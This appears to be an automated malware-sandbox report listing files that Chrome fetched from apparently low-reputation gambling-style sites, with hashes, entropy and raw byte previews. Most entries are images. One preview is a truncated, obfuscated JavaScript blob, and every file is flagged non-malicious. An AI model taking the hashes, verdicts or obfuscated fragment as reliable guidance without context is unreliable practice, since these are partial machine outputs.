                                                                                                                                                          Preview:.PNG........IHDR...5...2...........OIDAThC..tT...S&....$..B..*=p.b..!J...C.AD.....(.%...H.*...C..i..@H...2I&3sf.~.L@.."<.zg.....?.....?#q.r.g......=.d..>q.W|.zQ....J..(j....E2.R...-+..4.........$.;2..^%!D%p..s..Y...5........#$....y.A...\.....8..\:......Flt..C.....DU.....wJ.9......I.........j*UM.R..+...|......)...Rp[.n.@Q..d...E..K|...y..L.nw..P..-.r*.......... .^.K.@5.dt....".......JB.x..K .6......9U.B.%.\L."...E.q:..E7o.......=.rN.Zt..W.b/..K2>.f,^.,...oo.a.Ch.IA.Z5....$I.=.$4!:uL....xy..u/4..P.Q..p{. {.b...z....&o.B.(/.Kw.v.....r...lH....P%4.*.aDV.$(8...n.,$77.k.....Q..p...YAV.<.....L..]s....v.n.J.?.s?....I..PB..\....Y3(...*&....Uj...B..S...b.......@...$......0...(.n+C...!.l8..\.7."..2.jBV.x..!.*..-H^.$.P...jHG......p._!..q....e..S..",,..`...>TaV....&L..u..%.2...k4C.i.-.... n...$I..q......3....*.I819.P.....+.B.......M1LY..[6.tK...IEF...^!K.....?..#.>|..].=....?.........o....\.RM..Z..["q..d<DV=...e.....K....p..Pt........c..Y.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2756), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2756
                                                                                                                                                          Entropy (8bit):5.896185491872585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V8dnAImgQA4/4U1HjCiiI8cGsrve2VhY3hmTlDRlm2NdyqbsCafXTcI1FqTrPUim:V8gFWU1H7iI8krSElDRlmgdXbmwI1FsO
                                                                                                                                                          MD5:FAB708A58E7441D050A75FD27FE1C8C0
                                                                                                                                                          SHA1:699B9FB8FA80B435037E81AAC72D4D1FDD5FA1AC
                                                                                                                                                          SHA-256:F1EBDD7CB694B2D01550386A7B274DB6B28C6243D76147723E614C232127617B
                                                                                                                                                          SHA-512:FA8190CB90CA691F52FD11C19E272B9E58C3269414CAFC48E664AB41852D8FC9C52B287E5926CB0B4920A3EFA0277D4181995BC8C12F412EABF4F6AC95F8E042
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/menuSubA.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQBbKAgAcRB2dmskIexRTiQAGRQAc2MA0TB0CXMUGe3/Ei2kUwB1USIhQrIICwgkek2kZjBjnNOsdjAZgbc7FYkM8SHooOwoExWBxuIMyHJlsw5GgyD5tuwfqQkAALFDAABCZ2+EVwMVGMEuEGYqz09EGw1G4207Cms3mSxWaw2dz2hzQx1OaHOFiukhB9yeL0KwHhMGJ9DIkull2uSLYXB46zI7GJ2x0804lKlSEwQjpJBmy1Jem+ZCMPlWch2+L1KMNIgx7CxaBkAH4HKakDptqLjAAfOMms3bR5CABkaaTUZJZKtElD3yj7s9mBY+tRvADmOxonJAElWpknOTVK0AKoAZVEERSUZgPigAC9B3FCaN9ssAMID4e+g1lPgCYTo6shnz6QxQXzsHTk0E6ftDwd7tB6Xj8QR2kiSdgPTh6E1zisiTiMCNmoEiRIyFIAEgyADEfxgO4IBSk4ogANRZjowHRnohTsL2OhGKeGSzGBzAALR4rIWG+PQIDUJgURCAUyhFqC6GOlKOH4vhPgFAeSA2qIwD3iaAQ7qhZ6iHiTFIJwg4gLaABUDgoVRfGcIRxGkUx7EPsStqQbgQiQaIEDAnaow3qYKDfGWfpoq+mARDBn5kN+SB/tRmFYXMxgAHx4rJGTQZG0aniAnQaWRiG2aIQH/KB4FQTBcH3vE/5BcBoXMBBHlmpFCHMTauKGASUYoIwjA3raOh+Iw7BYe48LEuaYA2rwOiKSatpYT
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2442
                                                                                                                                                          Entropy (8bit):7.469194340286183
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuij6eJ3jt7IhrMCsm1cn40wt2GnLh73RiJtqxsTeOzo:2NIG7Ihr31oDwnLRQqxOzo
                                                                                                                                                          MD5:ED097FE6098C539EC482E67E5ACBF451
                                                                                                                                                          SHA1:7BC83D0908219E78AE0FF4811FA5D6935D24184B
                                                                                                                                                          SHA-256:FAA10874B0AF9B5A478AE1775B6B1F0ECA93B76FFB681AF56E98F651D751E803
                                                                                                                                                          SHA-512:588A81A0DAE5BAE607A7EF8B401C60592A516FD65440B2D32BA92244BB84B199528D178F1BA8139B29B9A3BF76434DEBC2CFDCC1A010C9603641AD0818E601C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_bg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:0F9F88E1F77811E7BC26CA443FF92646" xmpMM:InstanceID="xmp.iid:0F9F88E0F77811E7BC26CA443FF92646" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1183
                                                                                                                                                          Entropy (8bit):7.759551068349599
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:odWbvmeQvHbu9BC3pi8fp4+ZN8frdFz5zuUNNGTV6:bLJOHbUBC3fpKjnlNiI
                                                                                                                                                          MD5:CA3BD9886983F8466A5BDFB873F2195D
                                                                                                                                                          SHA1:F280828EB86E04980D30E119721B5495710531CD
                                                                                                                                                          SHA-256:1E4442B334D2307688561B2975F9991720328763473D8F552C0EC164B6887F78
                                                                                                                                                          SHA-512:C0C885D86876824ACC23C083A427BC31CE2164B689C8E65FF1CCAB20A3D16F24D08772F9DB24E699ACE6229E8DCF32BB795C0F8204A84C044EC6F2A3D55B7AFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...'..6w ..!}..X.89....+.. ...d%~..U.{.i.|..s.!.."z..S..$z.8{..czL..l.!...{.c.c.)t"|..:.#...*t".."W.?...j.FR.3...,{.9w.)s...*r.3y..b$z.*...j..<|.)q$..'x..I.. l.!n6..:x$..D^.(w..S......o.2...n..h.........\.._..8..'t..e.._..Z......................"..}..{......r.u..[{.5n..c.]o.\l.cQ.%T..B..J.!G..=..;..9}.3}.2|.%o..f..d..R..J......................................>.......f..1....:..+........>..../..........h...............K..Z.....d..`..d..'...w..k..x.....w.Fv.|..f..3s.l...g.'u.r~.8i..i..j..U..T.Wt.ax.iy.Je..^.2d..c..W..W..T..S.Wi..[.8S.O^..L..M.AR.#L..P.XF.?D.PV.7B.MH.>M.^5.IL..M..=."6..?.,>..'..E.!6}b2}..y.,y.&y.(w..r((q..o.!n .n..n..m..i..h..h..g.......=tRNS.. .............................................wwWR;:54/)..........tIDAT(....BmQ.....m#.....m.m.m....U.A.u`.........7/..*?\.W.ivg.+...m.{...,..5]h...5."~....Y]....5%&.1....fW_.=q'':}...0.V......>..eA.7..=..h.7j...jU(8&B.....u._.mxj.x{Q.....}.S.bH...;....i..1..lXr..4
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://xpj723.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):51601
                                                                                                                                                          Entropy (8bit):7.989982708871979
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:RkTHJyR+I/EOhoB0ssIgslNYhElDr/NfGA42Sc2cyMyfzcTbq6wf4nCsoyi:RwpW+vOhe05s7Zr1fGALyfQH4wnkyi
                                                                                                                                                          MD5:C9C3302D6626018A1364C36C5B44A41F
                                                                                                                                                          SHA1:FDE1D597A3244D26CA9F2325DA88D3D9C691142C
                                                                                                                                                          SHA-256:F1BBD17C54B742DDBBF0CEDB24734135D140A847384582DDCC9905064721E7ED
                                                                                                                                                          SHA-512:AA9719435D984B0234E74C5528FFD375AD275C4A9E0DBDAF855691BADA071C7E61026A301E506578CD4803998DAC454CF47AACACBA36CCD20762D3687D3C4D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/game/img_live.png
                                                                                                                                                          Preview:.PNG........IHDR...............Y....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A0E2827A21F411EE92C293F42C87E92E" xmpMM:InstanceID="xmp.iid:A0E2827921F411EE92C293F42C87E92E" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:11701983F3A011E7890AE1B5CDF91674" stRef:documentID="xmp.did:11701984F3A011E7890AE1B5CDF91674"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..i.%Yv.v..o./......{....9...w....)z....-.0.....~..B.....l.... M..44.....{.kVU.o..{}.../..?
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3815
                                                                                                                                                          Entropy (8bit):7.764144400885233
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:dOvnLpW4eJ32vQjum9vyRy/BjTIb6nsoKb2Gjs/DJJDotya6S+HPMb5L3wV6spkQ:gFpiZNbUFjsrJJM16mtLwVda6+cFe4p
                                                                                                                                                          MD5:461EA1D38563D49E71934D6F017BEEFF
                                                                                                                                                          SHA1:434D79302437192EEE2895F3B3C76E10BAC03177
                                                                                                                                                          SHA-256:ACC6F1A970280D2A5DDDEE278C9DD691EED059F5FB410894AED33B20A6863340
                                                                                                                                                          SHA-512:2E2500179BD6F349E549668047CB7E74722D7EC24B0A1FDA5DC32574211DD956EE54E4DC3160B6D9D3575953C3BE569EBB2232E22897CD7B8832345CF9CBB8F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_pg.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...niTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:054D0146103211EB8E23E60DB73194B4" xmpMM:InstanceID="xmp.iid:054D0145103211EB8E23E60DB73194B4" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:070664E0F77811E8AE71AEF0D532570E" stRef:documentID="xmp.did:070664E1F77811E8AE71AEF0D532570E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Z.L...>3.....S.."(."..(....F.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 165 x 165, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11893
                                                                                                                                                          Entropy (8bit):7.947833885578854
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:LyNNSs2q8sPgUmfCqVNJB4AQElMLqWEY6su8F6BpwDDkEnzPwsW2HUk86fyg:LyNNT2s4jf/41oyqWEY6suLBWDnzPwsh
                                                                                                                                                          MD5:B27E85B76F1B3DCDD4D98C789E51CFD9
                                                                                                                                                          SHA1:BA8EC058785FD8A0E1405D6643175CD7CF92DF28
                                                                                                                                                          SHA-256:01CF3C6CA09D7B6003FAF27CDF6FF31DC52EC67F73070A6C81BFCB50B7B9EA4C
                                                                                                                                                          SHA-512:0B835C7F0C8B05101A96F3CB43FB08577A8090B920417C5110CC0B2D0FF9E8FE5BD9B352BF305109245FD5B28D1FFCE757EE394B84FBF3386777D1119687228C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............=+=.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:26dd70ad-1e68-4847-a630-c1be6753ad0b" xmpMM:DocumentID="xmp.did:9640B8B49CE411E7AFAECB64E807888A" xmpMM:InstanceID="xmp.iid:9640B8B39CE411E7AFAECB64E807888A" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2f1ed4b1-bf86-774f-b9f0-6d0256dc0b0e" stRef:documentID="adobe:docid:photoshop:37a3863a-8f0a-11e7-af57-e7d8bbca7e19"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>i.....*.IDATx..}{.m[Y.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 180 x 45, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3968
                                                                                                                                                          Entropy (8bit):7.8318716321861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:blg2STKHJkX5t/ycPi3Yh/6eEu69hNjVe8pHTAs2AKS:b5pkX5IbM6jVe0HTRJ
                                                                                                                                                          MD5:5D7A0A2EA8FC1B8ABC5A525F59A3B3D8
                                                                                                                                                          SHA1:632F7A9CF38606D35C3076E3DC61AB9ACD6F3B4D
                                                                                                                                                          SHA-256:D3F18938D4C9C9195C566386E4B0E3AF3B63FEE043E5BCCD445EFC84B61B5D6F
                                                                                                                                                          SHA-512:D730554A27C02DA4964581E2B9D4FDB635B5650904CF08DF2C33537F0F22393E7579FC087C010375AF2554DB516600115909D786AB1613F4E53F3C8A84ADE798
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/btn_service_n.png
                                                                                                                                                          Preview:.PNG........IHDR.......-.............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:1F497DFDF3A111E7BA819AFA36D3A361" xmpMM:DocumentID="xmp.did:1F497DFEF3A111E7BA819AFA36D3A361"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1F497DFBF3A111E7BA819AFA36D3A361" stRef:documentID="xmp.did:1F497DFCF3A111E7BA819AFA36D3A361"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>d.e.....IDATx..\.p......_.rI.....A+\......P...S..$..8P%.Q.(&....!...'..vZ..:...&.P@......$H"..\.....l..6..K.%...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9383
                                                                                                                                                          Entropy (8bit):7.945473359967166
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:doM1tu7m35NUMNwEXUSjc8Ivu2elhnVpsf92xcGs37dy4F:d3OctZI+ldAf4x03rF
                                                                                                                                                          MD5:DEBACF9070C65425082DDA4CF10B97AD
                                                                                                                                                          SHA1:EF33A0BE344A9785D166E8CD0EAB5C98A7C1E4B4
                                                                                                                                                          SHA-256:20BAFC135CDDDF5A1B9AF67F6AD86436235872F43FB0B99A3ACDD6664F8C7FAB
                                                                                                                                                          SHA-512:29E307DD248A081D1250355B312E7E34B67CAAF481F899477195B221944BA51D1BD00C864CCBD44565C7AD0B2A91E3C803BA9734B119822608FE699E041D9582
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/fish_bg-w.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:4ED94AA289F711EAB484DB62618B7FF3" xmpMM:InstanceID="xmp.iid:4ED94AA189F711EAB484DB62618B7FF3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:be729f8c-7560-a744-bcd3-b1736b476fc8" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..BD.. .IDATx..{gtT...~.3....*.I #z
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49412
                                                                                                                                                          Entropy (8bit):7.988764073424515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:thZdBEHwWpB52FIeSebPpz0WhTIKxNxgLcVZzn/fFyN50ZcGfOF/Kj2qAP:thZdmHtkIeS4d0UNxNqeyN5L4h2qAP
                                                                                                                                                          MD5:755C1BECB26F7616AA445D0BF258402B
                                                                                                                                                          SHA1:C1F6D80B1A475393CE38D116A1956A6DB643BCB5
                                                                                                                                                          SHA-256:0C08ABD709E8AF33990E57477A53C16FEAF932981894BA2017BAF1C81D8F590D
                                                                                                                                                          SHA-512:AF76492007AE05EEE9AB13FA39D9527825564F51F2CEA8E4CFBBD4E4449E64A9DFFE4266136D151BFB5A36868B5CC2BD520763AE0A8E5474375BE61B0A3BF8E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:13:56+08:00" xmp:MetadataDate="2023-07-24T11:13:56+08:00" xmpMM:InstanceID="xmp.iid:84ea7bef-ea36-4ed6-8455-fe0c55d7a41b" xmpMM:DocumentID="xmp.did:1C22611AF3A011E79FA7F752D71B3C83" xmpMM:OriginalDocumentID="xmp.did:1C22
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):230401
                                                                                                                                                          Entropy (8bit):7.932188158268366
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:e8kZ1m2kPTjI4PTjI4PTjI4Pk6NWWoDWoDWoDe:zeP2bb9WhDhDhDe
                                                                                                                                                          MD5:693DF977829DA3E7192DE107D21B601D
                                                                                                                                                          SHA1:C1A26C7AFD53136065B2425BD11C58601756B1F3
                                                                                                                                                          SHA-256:7171B5ACD31D4EA86B86F4D7EA092CADBC0301597947A92A4C66B342DF979B37
                                                                                                                                                          SHA-512:B93EF9CA478B754946C61D220985A0CDF853438572D63DF7290CB6E4D976E672E8BE240696CC35A4BEE3B0DF6DF7673F81B7E8465C9C579E2C1ACB320CA8677A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d.............J1..vc......n....i..h.tN.......V........./.2%.T...y....z.......%..fdGm...%.ObU^.o..n.........1.....YH-)......5.S0.K.......M...H.M......fG......M....S.&..,.....u.......X=......m5..y.m.lE8.g.i,.......B.}...!..4....3(.ll....0..&./$..t./..TC.nL.J*,Nr....Q..SJ.3'.C...i..E........)..V...........$......iO.klb80...m*C.......i....T.......,...5q*..pv..t.UK......h..............................f..............T...G".... /E...........5?........................:=...w.....c.......1R;@.....)..z......d...c..y......#u...R~..!...........< !.SX.......a..f...................................................................................................................}.........J.......).Q.........!..NETSCAPE2.0.....!.......,......d......D.....e.E.v.R.o."Z Dq...3FL.,..g.?:..c.t.!SV....tY.E..!...M.I...gj..":.GA..(.(:e.U..-Y.d.}[....*.Vc..,X.e.E....m.];7.].x...v......,8pV...*^..c.~.WS<9ke.._..2..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972840809
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
